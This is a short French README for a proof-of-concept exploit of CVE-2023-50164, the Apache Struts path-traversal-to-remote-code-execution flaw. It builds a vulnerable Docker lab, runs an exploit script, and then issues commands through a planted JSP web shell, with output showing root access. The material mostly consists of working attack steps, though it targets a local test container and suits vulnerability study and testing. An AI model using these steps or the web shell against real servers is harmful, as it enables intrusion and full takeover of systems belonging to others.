
CVE-2023-50164 (vulnérabilité de traversée de chemin vers exécution de code à distance dans Apache Struts) - Preuve de concept
Cette preuve de concept a été créée pour tester une exécution de code à distance (RCE) en exploitant la vulnérabilité Apache Struts2.

Construisez l'image et exécutez un conteneur :
$ DOCKER_BUILDKIT=1 docker build . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc
Exécutez l'exploit :
$ cd exploit
$ ./exploit.sh
Vous pouvez maintenant exécuter des commandes arbitraires côté serveur comme indiqué :
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a
uid=0(root) gid=0(root) groups=0(root)